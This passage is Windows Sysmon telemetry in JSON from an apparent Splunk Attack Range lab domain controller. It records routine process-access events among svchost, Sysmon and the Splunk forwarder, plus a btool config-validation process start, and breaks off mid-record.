{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3711,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.073\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.073","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3712,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.073\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.073","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3713,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.073\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.073","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3714,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.073\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.073","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3715,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.073\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.073","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3716,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.073\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.073","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3717,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.073\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-0010B6910500}\r\nTargetProcessId: 4752\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.073","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010B6910500}","TargetProcessId":"4752","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3718,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.292\r\nSourceProcessGUID: {E2A3D6B1-1105-5F25-0000-0010B6910500}\r\nSourceProcessId: 4752\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.292","SourceProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010B6910500}","SourceProcessId":"4752","SourceThreadId":"4592","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3719,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.381\r\nProcessGuid: {E2A3D6B1-1105-5F25-0000-0010D2950500}\r\nProcessId: 4748\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nParentProcessId: 3828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 